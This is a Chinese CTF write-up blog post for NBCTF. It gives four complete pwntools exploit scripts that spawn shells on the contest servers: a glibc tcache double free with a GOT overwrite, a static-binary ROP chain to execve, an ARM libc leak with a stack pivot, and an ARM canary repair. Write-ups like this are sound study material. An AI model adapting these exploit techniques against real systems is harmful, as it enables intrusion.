本文介绍: day2打了一个叫NBCTF的比赛做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。

day2打了一个叫NBCTF的比赛

做了四个题，剩下五道 ARM 的题不会做了，关注一下 wp，也许可以靠这个比赛提升一波异架构能力。

heapnotes

glibc 2.31 的简单堆题，没啥好说的：edit 可以改已释放的 chunk，绕过 tcache 的 key 检查做 double free，拿到 GOT 上的任意写，直接改 GOT 就行了。

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
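context.arch = 'amd64'
# Target selection. The remote instance is the live one; the commented lines
# are the usual local / LD_PRELOAD / qemu variants of this template.
#io = process("./pwn")
#io = process(['./pwn'], env={"LD_PRELOAD": "./libc64.so"})
#io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
io = remote('chal.nbctf.com', 30172)
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

# Short I/O aliases used by the menu helpers below.
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# Print a named address in red. `eval` is only ever fed a variable name
# literally typed in this script -- never pass it anything received from the
# target. The ANSI escapes are restored here (the blog rendering dropped the
# backslashes, leaving a literal "33[...").
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a partial little-endian leak, NUL-padding it to full width. The fill
# must be a single byte: the garbled `b'x00'` (3 bytes) raises TypeError.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))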
def menu(choice):
    """Pick menu entry *choice* once the "> " prompt appears."""
    io.sendlineafter("> ", str(choice))
def add(context):
    """Menu 1: allocate a new note whose contents are *context*.

    (The parameter name shadows pwntools' ``context`` inside this function
    only; it is kept unchanged so existing callers are unaffected.)
    """
    menu(1)
    io.sendlineafter("Input note data: ", context)
def show(index):
    """Menu 2: print note *index* -- the leak primitive used below."""
    menu(2)
    io.sendlineafter("): ", str(index))
def edit(index, context):
    """Menu 3: overwrite note *index* with *context*.

    The exploit below calls this on an already-freed note, i.e. the program
    does not check the note's state before writing.
    """
    menu(3)
    io.sendlineafter("): ", str(index))
    io.sendlineafter("Input note data: ", context)
def free(index):
    """Menu 4: free note *index*.

    The exploit frees the same index twice, so the program evidently does not
    clear or invalidate the pointer after freeing.
    """
    menu(4)
    io.sendlineafter("): ", str(index))

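bss = 0x404120  # not used in this exploit; left over from the template

# Step 1: heap leak via the tcache `next` pointer of a freed note.
add(b'/bin/sh\x00')  # note 0
add(b'a' * 8)        # note 1
add(b'/bin/sh\x00')  # note 2 -- the string show() will later pass to system()
free(0)
free(1)              # note 1's tcache `next` now points at note 0's chunk
show(1)
# glibc 2.31 tcache stores raw (unmangled) pointers, so the leak is a plain
# heap address; 0x2a0 is the blog's measured distance from the heap start.
heapbase = uu64(io.recvline()[:-1]) - 0x2a0
lg("heapbase")

# Step 2: tcache double free. Editing the freed note clobbers both `next`
# and the `key` field, so the second free() is not detected.
edit(1, b'a' * 0x10)
free(1)
# The first allocation pops note 1 and writes the target address into the
# entry still in the bin; the second pops it again; the third returns the
# target itself. 0x404020 is presumably puts@got (confirm with elf.got) --
# it is overwritten with system@plt.
add(p64(0x404020))
add(b'a' * 8)
add(p64(elf.plt['system']))
# show() on the "/bin/sh" note now calls the hijacked slot -> system("/bin/sh").
show(2)
irt()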

ribbit

直接写 ROP 硬拿 shell 就好，不用管它所谓的 win 函数；反正程序是静态编译的，什么 gadget 都有——用 read 把 /bin/sh 读到 bss，再 execve 即可。

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
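context.arch = 'amd64'
# Target selection. The remote instance is the live one; the commented lines
# are the usual local / gdb / LD_PRELOAD / qemu variants of this template.
#io = process("./pwn")
#io = gdb.debug('./pwn', 'b*0x401922')
#io = process(['./pwn'], env={"LD_PRELOAD": "./libc64.so"})
#io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
io = remote("chal.nbctf.com", 30170)
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')  # static binary: no libc needed for this one

# Short I/O aliases.
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# Print a named address in red. `eval` is only ever fed a variable name
# literally typed in this script -- never pass it anything received from the
# target. ANSI escapes restored (the blog rendering dropped the backslashes).
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a partial little-endian leak, NUL-padding it to full width. The fill
# must be a single byte: the garbled `b'x00'` (3 bytes) raises TypeError.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))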
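# Gadgets from the statically linked binary (addresses as found by the blog).
rdi_ret = 0x000000000040201f  # pop rdi ; ret
rsi_ret = 0x000000000040a04e  # pop rsi ; ret
rdx_ret = 0x000000000047fe1a  # pop rdx ; ret
rax_ret = 0x0000000000449267  # pop rax ; ret
win = 0x401825      # the intended "win" function -- not needed, kept for reference
puts = 0x40c7b0     # unused
t_read = 0x448800   # read() inside the static binary
bss = 0x4C6800      # writable scratch area that will hold "/bin/sh\0"
syscall = 0x0000000000401dd4  # syscall ; ret

# Chain: read(0, bss, 8) to land "/bin/sh\0" in .bss, then
# execve(bss, NULL, NULL) through raw syscall 59.
# 0x28 bytes of padding reach the saved return address.
payload = b'a' * 0x28
payload += p64(rdi_ret) + p64(0)
payload += p64(rsi_ret) + p64(bss)
payload += p64(rdx_ret) + p64(8)
payload += p64(t_read)
payload += p64(rdi_ret) + p64(bss)
payload += p64(rsi_ret) + p64(0)
payload += p64(rdx_ret) + p64(0)
payload += p64(rax_ret) + p64(59)
payload += p64(syscall)
sla("Can you give my pet frog some motivation to jump out the hole?", payload)
# Exactly 8 bytes, matching the read() length in the chain; sent without a
# trailing newline so nothing extra is left on stdin.
io.send(b'/bin/sh\x00')
irt()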

ret2thumb

自己用 qemu-arm 跑的时候可以直接怼 shellcode，用它给的环境就不行，有点奇怪，而且没看出这个题和 thumb 有什么关系。直接泄露 libc，然后把栈迁移到 bss 上 ROP 就行。不过要事先找到能控制 r0 的 gadget：直接用 ROPgadget 搜只能搜到控制 fp、r3 和 r4 的 gadget，但仔细找的话会发现，把 0x10500 处的 `mov r0, r3; pop {fp, pc}`（下面脚本里写的是 0x10550，以二进制为准）和 `pop {r3, pc}` 结合起来就可以直接控制 r0——这也是为什么可以直接泄露 libc 再 ROP 的原因。

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
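context.arch = 'arm'

# Target selection. The remote instance is the live one; the qemu lines are
# the local setup (add "-g 4321" and attach gdb-multiarch to debug).
#io = process(["./qemu-arm", "-g", "4321", "-L", ".", "./pwn"])
#io = process(["./qemu-arm", "-L", ".", "./pwn"])
io = remote('chal.nbctf.com', 30175)
elf = ELF('./pwn')
# Wait for a key press so gdb can be attached to qemu first (replaces the
# Python-2-only raw_input()).
pause()
libc = ELF('./libc.so.6')

# Short I/O aliases.
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# Print a named address in red. `eval` is only ever fed a variable name
# literally typed in this script -- never pass it anything received from the
# target. ANSI escapes restored (the blog rendering dropped the backslashes).
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a partial little-endian leak, NUL-padding it to full width. The fill
# must be a single byte: the garbled `b'x00'` (3 bytes) raises TypeError.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))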
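main = 0x10510          # unused
bss = 0x12600           # writable area the stack is pivoted into
gadget = 0x104F0        # appears to be the vulnerable function's body (just
                        # below main): prints r0 and reads input again --
                        # confirm in a disassembler
r3_pc = 0x00010388      # pop {r3, pc}
r0_r3 = 0x10550         # mov r0, r3 ; pop {fp, pc}  (blog text says 0x10500
                        # for this gadget -- verify against the binary)

# Stage 1: leak puts@libc.
# After 0x20 bytes of buffer the frame holds saved fp, then saved lr:
#   lr -> pop {r3, pc}             : r3 = puts@got, pc = r0_r3
#      -> mov r0, r3 ; pop {fp, pc}: r0 = puts@got, fp = bss+0x24, pc = gadget
# With fp pointing into .bss, the function's fp-relative epilogue pivots the
# stack there, so the next input line (stage 2) is read into `bss`.
payload = b'a' * 0x20
payload += p32(bss)             # saved fp (replaced again by the r0_r3 pop)
payload += p32(r3_pc)
payload += p32(elf.got['puts'])
payload += p32(r0_r3)
payload += p32(bss + 0x24)      # new fp -> pivot into .bss
payload += p32(gadget)
payload += p32(0) + p32(bss)
sla("Can you ret2thumb? \n", payload)
# 32-bit target: take the first 4 bytes of the leak (puts may keep printing
# the following GOT entry) and unpack as a u32.
libcbase = uu32(io.recvline()[:-1][:4]) - libc.sym['puts']
lg("libcbase")
system = libcbase + libc.sym['system']

# Stage 2: this line lands at `bss`; offsets below are relative to it.
payload = b'a' * 0x24
payload += p32(r3_pc)
payload += p32(bss + 0x38)      # r3 = &"/bin/sh" (offset 0x38 into this payload)
payload += p32(r0_r3)           # r0 = r3 ; pop {fp, pc}
payload += p32(bss)             # fp (don't care)
payload += p32(system)          # pc = system("/bin/sh")
payload += b'/bin/sh\x00'
io.sendline(payload)
irt()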

canary-in-a-coal-mine

程序给了 gets，还给了一个功能：从某个已知地址出发沿指针链走任意步，再把读到的数据写到栈上。开了 canary，但给了后门，所以直接用大量后门地址覆盖整个栈（canary 也被盖掉），然后利用这个功能在 bss 上找一个最终能指向 canary 的地址，把真实 canary 写回对应位置，绕过 canary 检查即可。

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
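context.log_level = 'debug'
context.arch = 'arm'

# Target selection. The remote instance is the live one; the qemu lines are
# the local setup (add "-g 4321" and attach gdb-multiarch to debug).
#io = process(["./qemu-arm", "-g", "4321", "-L", ".", "./pwn"])
#io = process(["./qemu-arm", "-L", ".", "./pwn"])
io = remote('chal.nbctf.com', 30178)
elf = ELF('./pwn')
# Wait for a key press so gdb can be attached to qemu first (replaces the
# Python-2-only raw_input()).
pause()
libc = ELF('./libc.so.6')  # loaded by the template; not needed for this exploit

# Short I/O aliases.
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# Print a named address in red. `eval` is only ever fed a variable name
# literally typed in this script -- never pass it anything received from the
# target. ANSI escapes restored (the blog rendering dropped the backslashes).
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a partial little-endian leak, NUL-padding it to full width. The fill
# must be a single byte: the garbled `b'x00'` (3 bytes) raises TypeError.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
win = 0x10828  # backdoor function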
def menu(choice):
    """Pick menu entry *choice* once the "> " prompt appears."""
    io.sendlineafter("> ", str(choice))
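def mine(index, depth):
    """Menu 1: "mine" starting at *index*, following *depth* steps.

    The prompts end in a newline followed by "> " (the blog rendering had
    dropped the backslash of the "\\n" escape).
    """
    menu(1)
    sla("mining position\n> ", str(index))
    sla("mining depth\n> ", str(depth))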
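def extract(index):
    """Menu 2: "extract" minecart *index* (writes the mined value back).

    The prompt ends in a newline followed by "> " (restored "\\n" escape).
    """
    menu(2)
    sla("minecart number\n> ", str(index))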
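def gets(payload):
    """Menu 3: the unbounded gets() read -- send *payload* as the overflow.

    The prompt ends in a newline followed by "> " (restored "\\n" escape).
    """
    menu(3)
    sla("collapsing mineshaft\n> ", payload)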
# Flood the stack with the backdoor address. The +1 sets the low bit so the
# return interworks into Thumb state (win is Thumb code on this target).
# This also tramples the canary, which the next step repairs.
payload = p32(win + 1) * 0x20
gets(payload)
# mine()/extract() walk a pointer chain from a known address and write the
# value they reach onto the stack. 0x21038 is the start the blog chose
# because, two steps in, the chain reaches a pointer to the real canary;
# "extract(8)" then drops it back into the canary slot. The exact chain is
# not visible here -- verify in a disassembler.
guard = 0x21038
mine(guard, 2)
extract(8)
# Leave the menu: the function returns, the canary check passes, and the
# overwritten return address lands in win.
menu(4)
irt()

原文地址:https://blog.csdn.net/weixin_46483787/article/details/134752187
